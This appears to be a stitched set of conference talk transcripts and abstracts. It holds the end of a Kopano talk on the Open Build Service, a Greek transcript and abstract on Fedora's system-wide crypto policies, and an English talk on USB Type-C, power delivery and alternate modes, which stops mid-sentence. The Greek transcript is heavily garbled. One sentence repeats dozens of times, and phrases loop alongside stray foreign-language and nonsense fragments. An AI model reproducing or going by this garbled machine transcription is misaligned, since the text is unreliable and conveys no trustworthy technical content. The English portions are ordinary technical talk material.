doing them in OBS. Then we have the manual part where we say, hey, there's some sort of QA that comes behind. Here, to be honest, we cannot do it for every commit, obviously, but already this chain of our unit tests, for instance, being executed inline with every build that's already a big relief. Yeah. And if QA is not happy, you can see this not happy software tester. He is upset because of your code. It's below if you cannot read it. Yeah. So that's the whole chain that we established. Yeah. I think. Great. If you want to know what Copano is all about, just out of curiosity, I have tomorrow a workshop, three hours, where you can really see a full setup from scratch. If you take a laptop with you, virtual box, whatever, we can set it up together, and you would have a real full communication stack which communicates with your mobile phones and Outlook and so on. Yeah. I think that quite shows how we use OBS. Questions? No. All right. I'm still hanging around. So if there's anything that you want to come up with, just approach me. Thanks.
OBS (Open Build Service) is an awesome piece of software which is yet unmatched by other available software suites. This talk shows how Kopano approached the change in their build system, and how they integrated fully fledged build requirements into OBS. From adding real custom distributions such as Collax (just using DEB, without bootstrapping at all) to integrating with Atlassian Stash - All this is possible with OBS and much more. How did we make OBS accessible for Windows users (using osc), how did we make sure we can make a sane structure based on build-time requirements for packages and not just include everything for distribution in the end? Where can I use curl requests, and how are they structured. And did you know there are authentication tokens? This talk delivers the answers to these questions. This talk will include a QA session in the end with the chance to give an answer on many (unfortunately also undocumented) features.
10.5446/54606 (DOI)
Η Γιαντάθρη Μπο την Εbuzή нам τον Μκίδε athletes. Γεια σας, μου είναι ο Νίπλος Μαύρη Ανο ��year. Έρnap Moduleנό. Έτσι, συμβ Ihnen. Girls皆 можно. Αυτό το σημαντικό της πρόσφυγας είναι να εξαφερήσουμε για την εξαφερία και να δούμε τι μπορεί να δημιουργήσουμε. Είναι, δεν μπορώ να δούμε εσύ, εάν θέλεις να κάνεις κάποιες εξαφερές ή να κάνεις κάθε εξαφερές, καθώς το παράδειγμα, δημιουργείς να είσαι διότι εξαφερές, γιατί είσαι δυνατή. Τι θα δούμε είναι να σας δώσω την προσφασία γιατί χρειαζόμαστε το συστήμα του κρυπτοπολίσεις, και τα βασικές που δούμε να δούμε. Τι είναι το σχέδιο της στιγμής, όπως έχουμε στην Φεδόρα. Τι είναι οι προσφασίες που εξαφερήσαμε, λεσσονάς που έρθουν και τις εξαφερές μας. Ποιος είναι εμένα, εξαφερήσαμε, εξαφερές συγκριπτές, όπως μιλήσαμε, πιο εξαφερές για τα προσφασία κρυπτο-γραμμές. Οι προσφασίες μου είναι νουτιαλές και οι αυτοκρατικές παιδιά, και εγώ έχω συμβουλίσει να δούμε το WRT. Και εγώ ξεκινώ με το συστήμα του κρυπτοπολίσεις, στην Φεδόρα. Παρακολουθούμε να δούμε την προσφασία. Ποιος χρειαζόμαστε, δηλαδή, ένας αντιμετωπίστης, δηλαδή δεν εξαφερήσει ένα συστήμα, πιστεύει πιστεύει ένας καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-καω-κ κυρίως, με το κοινόδιο και με το κοινόδιο, με άλλες συστήματα. Και αν θέλουμε να είναι ακόμα, το συμμετεχνάμε με το CURL, WGET, Firefox, Apache, SSH, OpenVPN, ή πολλές εξοπλές που θα βρεις στην αλήνουξη δημιουσία, like Fedora or OpenSusA. Και η εξοπλήτηση είναι πώς η εξοπλήτηση είναι, είναι η κανένα που είναι εξοπλήτηση από το κοινόδιο. Αν κάποιος συμμετεχνάει το κοινόδιο με Apache, πώς η εξοπλήτηση είναι αυτή η εξοπλήτηση, πώς είναι η δημιουσία, η δημιουσία της δημιουσίας. Αν κάποιος είναι ο κοινόδιος, πιο δυνατόν, πως δεν ξέρω ή ξέρω για αυτή η εξοπλήτηση, αλλά δεν ξέρω για κάτι άλλο. Οπότε η επόμενη εξοπλήτηση είναι πώς μπορούμε να εξοπλήσουμε την συγκρισία της δημιουσίας από το κοινόδιο ή από τα συγκρισία που εξοπλήτησουμε. Αυτό είναι το πρόβλημα που η εξοπλήτηση της δημιουσίας της δημιουσίας της δημιουσίας. Είναι η εξοπλήτηση της δημιουσίας της δημιουσίας, από όλα τα εξοπλήτησματα στην συγκρισία και από όλα τα λιμπιουσία. Θα ήθελα να κάνω ένα κοινό που θα αρέσει να είναι φασιμοποιημένη από το δημιουσία και το χρησιμοποιότητας των υποκλήτων, όχι από το δημιουσία της δημιουσίας. Από την εξοπλήτηση, ειναι εξοπλήτητας της δημιουσίας της δημιουσίας, από όλα τα λιμπιουσία, από όλα τα λιμπιουσία, από όλα τα λιμπιουσία, από όλα τα λιμπιουσία, από όλα τα λιμπιουσία, από όλα τα λιμπιουσία. Έχουμε ένας παραπληκτικός, που έχει, δημιουσία, αΕΣ256, από δημιουσία, που χρησιμοποιημένη και δεν χρησιμοποιημένη. Έχουμε ένα άλλο σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μπορείτε να το αλλάξετε 사용 kein ε intro. Έχουμε ένα σωθήμα που χρησιμοποιημένη και δεν μποlaraτε να το αλλάξετε! Έχουμε ένα σωθήμα που χρησιμοποιημένη και να το αλλάξετε! Είναι πολύ σκέψι, με τη διέγραμμα της κρίπτος. Αυτό που βρίσκουμε είναι ότι χρησιμοποιήσουμε μόνο η διεθνή τεχνική τεχνική πόλη. Είναι πολύ σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι. Είναι πολύ σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι. Παρακολουθήσαμε και στις τεχνικές φαδόρες με το 22, μεταξύ του SSL 3.0. Μετά το σκέψι, το κάναμε και το κατασχεδόσαμε. Τι μήνες πριν ήχομαι τώρα και μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι. Παρακολουθήσαμε και στις τεχνικές φαδόρες με το 22, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι. Επιτευθεθεί με κυφόσο brain, που δενγειωνόιλληρες recherche, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το σκέψι, μετά το χείιιιιιιιιιιιιιιιι. για κάτι συστηματικό. Σε κάποιες από τα ευκαιρία του ευκαιρία, έτσι είχαν ευκαιρήσεις να είναι ευκαιρήσεις, για να εξανασταθεί τις προσπαθές τους. Αλλά, αν είσαι ένας δημιουργείο της ευκαιρίας, σε πολύ μεγάλο πάντα, σαν δημιουργή της Fedora ή από την OpenSusa, έχεις ευκαιρήσεις ευκαιρήσεις της ευκαιρίας, δεν θέλεις ευκαιρήσεις να είναι ευκαιρήσεις. Γιατί δεν έχεις ευκαιρήσεις τι είσαι ευκαιρήσεις. Αυτό ήταν κάτι που εξανασταθήσαμε να τους εξανασταθεί. Αυτό είναι γιατί η Ευκαιρήσης Λευκαιρήσης έχει λίγο υποστηματικό για την Ευκαιρήσης. Και ένα άλλο σπίτι, είναι για την προακτήριση της ευκαιρήσης, γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Γιατί δεν θέλεις να είναι ευκαιρήσεις. Προακτήρισα τα令- (?) και facetable, Κίνουν και τα προακτήρισπα. Αυτό που έotted, είναι γιαησά~~~~ Όλοι τις πολίθειςchuckling a Shot, θάνει και να故 pub, δε την πιέ 보이는 ζηρή. Δ sangat σκοênio, Είναι πιο ευκαιρία να δούμε τα προγραφία της λεπτάς. Επίσης, δούμε ότι μετά από το πιστήριο που βλέπουμε, που βλέπουμε απλά σε SSL 3.0, έχουμε ένα πιστήριο σε έναν πιστήριο σε έναν πιστήριο σε έναν πιστήριο από την διστιμπιστήρη, όχι για να πιστήρουμε όλες τις αυτοπλικές που βλέπουμε στην Φεδόρα. Είναι το ίδιο για τις νέες αυτοπλικές που βλέπουμε στην Άρση 4 ή στην CBC Cypher, το ίδιο σκοπέρο. Όπως είπα, το Λόγγδαμ's αυτοπλικές θα ήταν αυτοπλικές. Τι πιστήριο θα κάνουμε στον πιστήριο. Είναι το ίδιο για να πιστήρουμε το Λόγγδαμ's αυτοπλικές. Αυτό είναι από τη διάφορα πιστήριο γιατί το Λόγγδαμ's αυτοπλικές είναι από τις αυτοπλικές που βλέπουν, οι αυτοπλικές διβελόμπες είναι πολύ αυτοπλικές και οι δυφόλες είναι πολύ αυτοπλικές. Δεν έχουμε πολλές προβλικές με τους, αλλά πιστήριο θα είναι καλή ιδέα να τους βλέπουμε στην πιστήριο. Έχουμε ένα τρακέριο, πού μπορείτε να δείτε ποιο στιγμό είμαστε για την εξαιρετική του εξαιρετικούς τρανδύσσου. Θα θέλω να αυτογεννήσουμε την πολιτισμία, γιατί στην πριν όταν ξεκινήσαμε, ήταν απλώς η Λόγγδαμ's αυτοπλικές, δεν είμαστε τίποτα νομίζωσες. Αλλά τώρα είναι τελευταία πολιτισμία για 8 προβλικές, πραγματικά. Δεν μπορούμε να αντιμετωπίσουμε κάποιος, τον Πόληση για την εξαιρετική του εξαιρετικού. Είμαστε πραγματικά, και πρέπει να το ρίξουμε. Είμαι και έχω ένα ρίξο πέντε. Ένανς εξαιρετικός που μας έκανε, ήταν ένα χρόνο για να φυγερήσουμε την εξαιρετική του εξαιρετικού, και να ανοήσουμε έναν κάνειание που παρακστείει, να τ έχει καος σφανιστικών διαφορίζεις και να παρέσει fuck credits, να να ανοίξει μια εξαιρετική πολιτισμή για αυτή την απλική fiction, αλλά ότι estadσ Suzuki τα π JOEσχ αυτόροι σadle Stell Το舊 εξυνελίσαμε την εξαιρετική καιν να έχει Πνιο δεν ήθελα να το συνε launching one Doyle Any. Είμαστε πίσωτε μικρά, Τώρα. Η στιγμή της στιγμής ήταν να δημιουργήσει πώς έχουμε Ενφαντοδορά. Φυματικά στην κάτι της παραδείξης είναι η Όξη της word. και μπορείς να δεις το εκεί. Και αυτό είναι το τέλος μου. Αν έχεις κάποια ευκαιρία, α Γθήσεριςόν, οι περιοχές στην Ελλάδα για να κάνουμε ευκαιρία. Τι σου λLPτίζονται. Είναι ένα δημιουργείο της ευρωπαϊκής ευρωπαϊκής ευρωπαϊκής, γιατί, για παράδειγμα, κάποιες ευρωπαϊκές πρόσκοπες έχουν ευρωπαϊκές για κάτι like MD5, αλλά, για την πολιτισία που θέλεις να προσφέρει αυτό, όλες οι άλλες ευρωπαϊκές ευρωπαϊκές είναι αυτοίχοι να χρησιμοποιήσουν αυτή τη χρησιμοποιή. Οι ευρωπαϊκές ευρωπαϊκές ευρωπαϊκές πρέπει να αντιμετωπίσουν mainly στο δημιουργείο ή το τέτοιο που χρησιμοποιήσουν την ευρωπαϊκή ευρωπαϊκή. Για την όπλα της ευρωπαϊκής ευρωπαϊκής, όχι για παράδειγμα, η ευρωπαϊκή ευρωπαϊκή ευρωπαϊκή ευρωπαϊκή ευρωπαϊκή ευρωπαϊκή ευρωπαϊκή, γιατί, αν την ευρωπαϊκή ευρωπαϊκή, αν τα ευρωπαϊκή ευρωπαϊκή ευρωπαϊκή ευρωπαϊκή,我跟你 να χρησιμοποιήσουμε μια τε reven with your specific policy arrangement a slide where I can use the specific policy for you towards this application. και την πολιτισμή. Για αυτά τα ευκαιρία, αν η νέα αυτοί είναι χρειαζότητα, πρέπει να είναι έφταση με την ευκαιρία. Δεν ξέρω αν αυτός σκέφτει την ευκαιρία. Μπορείτε να συμβείτε πιο πιο. Ευχαριστώ. Δεν κάποτε wie Ferris Τι διευτερός ή... Έχουμε τα αυστορία που θέλουμε, είναι τώρα αυστορία στην GNU TLS & OPP & NSS. Έχουμε αυστορία αυτές, και τώρα είμαστε τώρα ένα μονο με τα αυστορία του OpenSSL για να αυστορήσουμε κάποιες διευτερός που μπορούμε να χρειαστεί. Άλλο και διευτερός δεν χρειαστείτε κάτι άλλο αυστορία, και για την αυστορία που κάνουμε, μπορούμε να κάνουμε αυτό από όλοι τα αυστορία που θέλουμε. Ενώ εγώ, πάνω. Εγώ, πάνω.
Currently each and every shipped application in distributions enforces its own policy on the allowed cryptographic algorithms/protocols. While for some this is a desirable property, for most non-UI applications and libraries in an operating system it creates an uncertainty on the available security level. The purpose of this talk is to describe the approach we've taken in Fedora to counter the issue, by enforcing system-wide policies, discuss the current outcome, lessons learned, and invite OpenSuse maintainers to participate.
10.5446/54609 (DOI)
Somebody give me some, yes. Okay, let's start, belated, but start. I'll be a bit faster then. Okay, I'm talking today about the Type-C plug and USB 3.1. And the main part will be indeed the Type-C connector because USB 3.1 is boring. It's just a minor revision, basically faster, nothing more. So the Type-C connector is, well, it's a connector, but why another connector? Firstly, it's faster and faster is always better. It's smaller, smaller than a conventional USB connector, not really smaller than a micro USB connector, but its main feature is its versatility. It can do more than just USB, and that is the reason people like it. It can do power and it can do other things, and it can do a lot of power. The obvious plan of that company, which makes a lot of products whose name starts with an I, is more or less to make a universal connector. So what can it do? Faster USB, twice as much. It provides these things called the alternate modes. This is, we run something else than USB over the connector. It also provides support for something which is called an accessory, which is another way to run something else about a connector, in this case mainly sound. It's just cheaper. Again, a feature incorporated for the company whose products start with I. And you can put a lot of power over it. In fact, 100 watts at the maximum. So it is also designed to unify and get rid of power connectors. It uses three main technologies for that, the Type-C connector itself, USB 3.1, which is interwoven in the specification in a rather complicated manner, and a USB power delivery, which is not strictly speaking limited to the Type-C connector, but in practice is and is indispensable for the operation of the connector in alternate modes. For USB, it works without. What does the connector do? It gets you a lot of data lines, different kinds of data lines. USB 3 and faster and USB 2 are physically separated. It gets you some pins dedicated to alternate modes, and it gets you a very diverse power supply. There is a power supply for the bus itself, and one for the cable, because the cables become actually active components under Type-C for most use cases. You can build a conventional cable out of copper, which is connected through, and it will work for USB, and maybe alternate modes if it's very short, but that's it. So under Type-C, the cables themselves become gadgets and can be talked to in quite a bewildering manner of ways. This connector is quite flexible. It can switch almost everything, again optionally. You can switch the communication mode, you can switch the mode in the sense of the alternate modes, the protocol you run over this thing, and it can switch the way you supply power in it. And during all this switching, it still retains a minimum USB 2.0 connection. USB, as you I hope know, is a strict master and slave protocol. That property is retained. There is just a method to switch between master and slave on the fly, and the master is also that part of the connection which decides which mode is to be run over the connector. The slave says what it can do, and the master selects and also has to make sure that the cable actually can do what it is required to do. In the power supply mode, under USB it is clearly defined. The master provides the energy, and the slave, if it wants it, can take it. If not, then it has to provide its own energy, and the master in every case has to provide its energy. Under the type C connector, and this is independent of USB, those roads can be switched over. So it is possible to power a laptop, let's say, from the monitor. Let's get to USB 3.0, 3.1, I'm sorry, because it can be quickly done. The raw speed, it's doubled, and that's it. The type C connector is not limited to USB 3.1 super speed, but super speed is limited to the type C connector. So if you want the full 10 gigabits per second, you need a type C connector. In other features, it provides a bit more of what we already have. There is one major news thing that I can't cover because it's too new and has too many implications, that is authentication. You can check that the device is actually what it claims to be. But I won't touch that now. To be noted is that master and slave are still distinct. So USB is obviously not peer-to-peer, but it would be possible or thinkable to have a device to be master and slave at the same time. But know that it's not how it works. You can exchange the roads, but it only has one role at a time. The main technology and the most troublesome part of the standard is actually USB power delivery, which technically is not limited to a type C connector. It is defined for the usual AB connector, but deprecated. So in practice, I doubt we'll see it. And it is not limited to USB. It is also used for power bricks, and if they are to deliver more than 15 watts, it's not just available, it's then mandatory. If you use it and are ready to ramp up the voltage, then your limit is 100 watts. If you do the math, that's 5 amps. If the cable does it, but we'll come to that. So it is also used in those famous alternate modes, which I will come to. But let's explain. One of those alternate modes is DisplayPort. So you can run the DisplayPort protocol over a type C cable and still use the power brick of your monitor as the source of your power supply for your system. And then the monitor and the system must negotiate what's called the power contract so that the monitor can properly budget its power and share it out, because the monitor might also contain a USB hub or something, which then would also be driven. If you use it for USB, the power budgeting goes down the whole tree over the hubs. If you use the alternate modes, that's not the case with the one exception of USB bridging, which allows you to run a subset of the power delivery protocol to the next level in a hub. But we'll come to that. The hubs, and that's the nice one about the protocol, you can ignore the feature. Then the hubs are on their own and must implement a limited amount of power budgeting. And if you don't like that, you can switch the hubs to the fully dependent mode, and then every request is rerouted to the host, and it has full control over the power budget in the system as a whole. How does it work? The power delivery thing on a technical level is most similar actually to a very primitive ethernet. It's implemented technically as a frequency modulation on top of either the power supply or a control cable, so arcane. It is, in contrast to USB, a truly peer-to-peer thing. From the protocol, every partner on that wire can talk to the other one. And there is, at a maximum, actually four partners on each connection. Yes, it is point-to-point, but one partner is the host, the second is the device, and this is not a joke, both ends of the cable, which results in a maximum of four partners. Yes. Each command is immediately replied to in an acknowledgement, which just means understood. There's a CFC involved, and the graphics I showed you was more or less the most simple exchange. There is a command and a response. The understood message has a very tight time limit, 15 milliseconds, so we absolutely cannot do that in user space, because the failure to meet that time response leads into the error handling, and this has very serious consequences. We don't want that. So this is either in kernel space or in many implementations, once we have a part of the power delivery protocol in firmware on an ACPI embedded controller, or something similar. That is something we have to keep in mind when we come to the API we can make. But let's go to this later. There is, for the API design, a further thing that we have to keep in mind. The response is usually yes, no, or later. Yes and no are rather obvious. The later part allows us to make a callback from the kernel into user space, and let user space set a policy, or to delay the kernel's action until user space has set a limit or a policy. What does USB power delivery do? It defines ways of controlling how power is distributed and delivered. One of the features is that we can go over the five volts. A USB C cable is in every case limited to five amps. So if you do the math, if you stay at five volts, you arrive at 25 watts. And if you ramp it up all the way to the maximum allowed voltage of 20 volts, you arrive at the whopping 100 watts. The actual selection is done by finding the greatest common denominator between the host and the device, where both sides advertise what they can do. And the actual choice is done on the device side, and the host then has the choice between taking the offer or rejecting it, and then start new negotiations, or to let it fail. It is also used for switching the data roles on the Type C cable. So you have to implement USB power delivery even in for that most basic feature, beyond the simple, faster connection to cryptography. The authentication is again not limited to USB. It can be done also in the alternate modes, and indeed in theory you can authenticate that your power brick is indeed your power brick, for whatever that may be useful. I have no idea, but it's possible. And believe it or not, you can use USB power delivery to update the firmware of your power brick. Yep, it... But still, in fact you can update the firmware of a cable. Yes, sorry, but that's the spec. Power delivery is also used to enter and leave the alternate modes. It also does the not-so-hard part of the error handling, and it's used to ask the cable about its capabilities, which is how much power can you deliver, which alternate modes do you support. This is not actually so trivial, because the spec also defines now optical cables for USB, so we need to know that. Power delivery has the main function of... well, not main, but according to its name, function of providing power. Power management with a Type-C connector is different from power management with earlier USB. In our runtime power management with earlier USB, we are concerned with conserving power. It's good if we can save power, but still the system has to work without it. With Type-C, if you get all your power over a Type-C connector, you can obviously not deliver the same amount of power over more than one Type-C connector. In fact, SU yourself will consume some power. You can't even deliver the same amount of power. Or if you don't go to the highest voltage, your laptop is not going to provide, say we have six ports, and each is supposed to provide 15 watts, not in battery mode. I'm sorry, not going to happen. So we negotiate what is called the power contract between the master and the slave, which again is done by comparing offers and letting the slave decide on which to select, and the master decides on whether to take this or start some new connection, negotiation. The master must be sure that its commitments do not exceed its capabilities, which would be trivial except for one additional complication. A USB power delivery device can express its maximum energy need and its current energy needs, which means that it's in principle possible to over commit power and manage this on the fly. This is a feature the host must negotiate, must guarantee, or leave to the hubs in case of hubs, but it has very serious consequences for the architecture if we decide to use this feature. We obviously can decide not to do over commit, but then we risk that our devices won't run, because we can't meet their combined maximum power limit. They also can say we use this much power at the present, but we are able to rapidly decrease our power needs. This is intended for devices which are charging their internal batteries from power delivery, and this feature can be used in kernel space and in user space to power down some devices to meet the power consumption of another device if it goes into peak mode. The policy for that is a bit involved. Alternate modes, and this is in my opinion and probably most people's opinion the killer feature of the Type C connector. This is designed to provide a universal connector. We've seen it does faster USB, which is good, but it couldn't be a sensation. It can be used to get rid of the power supply, but it can be used to get rid of the power supply. It can be used to get rid of proprietary power plugs. Also nice, not a sensation. I think in the long run we will see that most connector types other than the Type C will die, because it's rather expensive to develop something which is hot, plug-able, fast, durable, and so on. There has to be a reason for somebody to spend that much money, and it has to provide an additional benefit. If you can run your protocol over the Type C connector, then I guess there's no much point in that. If I have to make a prediction now, and I'm going to do so voluntarily, I'd say Type C will survive, Type A will survive, because it's much cheaper, and nobody really cares about his mouse. It's got to work. No reason to do fancy power delivery or so. I guess the Ethernet connector will also survive, and probably the Express Card connector, but beyond that I'm actually skeptical. Anyway, so which protocols are defined? For now, DisplayPort, Thunderbolt, PCI, and MHL. MHL is actually, and don't be disappointed, I had to look that up myself, is a video protocol which more or less ends up in HDMI. It's used to connect mobile phones to TV sets, but okay. The physical protocol is run over the wires in the cable. They can be switched. There is an action multiplexer in the Type C assembly on your motherboard, which allows you to physically reroute the cable or parts of it. So you get a direct connection from, let's say, your GPU or your Thunderbolt connector to the other side of the Type C cable. And how this is controlled, I will come to in a moment. So it is not in all cases defined to have a Type C connector for this. It is defined now for Thunderbolt 3, where it is mandatory, and it is defined for DisplayPort. For the other cases, we have what we are calling the alternate mode adapter, which is kind of a Type C to something else cable, like a real DisplayPort or an older Thunderbolt. So we have this kind of cable where we are talking to the plug instead of the device with the USB power delivery. Let's see how I run time. Okay. On the architecture level, we have more or less decided to see the Type C thing as a bus, as a bus without I.O. And what we use it for is more or less the hot plugging and the interrupt and error handling capability and the power management capability of a real bus in the device model. So if you switch your port to an alternate mode, let's say DisplayPort, you will get a real kernel hot plug event for your now DisplayPort monitor. So how do we control this goodness? There is basically an infinite amount of possibilities, which doesn't make it good. So the easiest thing would be to use ACPI. There is a standard called the UCSI, which allows us to use most, but not all features of the power delivery protocol. Then there is, we can go to the really defined bare bones of the hardware, which is an I2C bus, which connects all the ports to one master controller, has defined commands and so on. The problem here is if we do the voltage selection wrong, then we have a real problem. Devices are supposed to withstand 20 volts, but I am quite reluctant to put this theory to the test. And the few Type C drivers we have actually seen besides UCSI are unfortunately of yet another kind. They are a mixture of additional vendor specific registers on XHCI controllers and platform devices. Not good, but we will probably end up with a half a dozen or so at a minimum of Type C drivers, which will plug into the kernel into the generic layer. Okay, then let's see in the kernel. What do we have? Okay, the good news, USB 3.1 is finished. There are bugs left, obviously, and it's not quite so stable, but it's there. It works. The user space support is also there. Done. Great big cool. That is good, but not interesting. So the Type C connector itself. We have the UCSI driver. I hope and presume that Intel has tested it, but nobody obviously without a firmware can test it. So shit. It does the basic job and that's it. TCPM, now we will have to do this, but this is going to take some discussion. There is a generic Type C bus type, which is in the kernel. There's the plug in to the individual drivers, which at least for what Intel has now is working. And there is an API to user space for using this whole stuff. So what possibilities do we have? We have now decided to split the alternate mode and the power delivery stuff in the narrow sense in two and to implement only the mode selection and the data role selection and so on under the Type C bus, because this is a split that is more or less forced upon us by the UCSI driver. That's how it works. And if we are going to see power delivery in the narrow sense being implemented in microcontrollers, we cannot put this into this directory. And frankly, we are not at the point where we could set an API for this in stone. So we don't do it. Power delivery is quite hard, because on the one hand, it has got nothing to do with USB. And on the other hand, it is implemented in 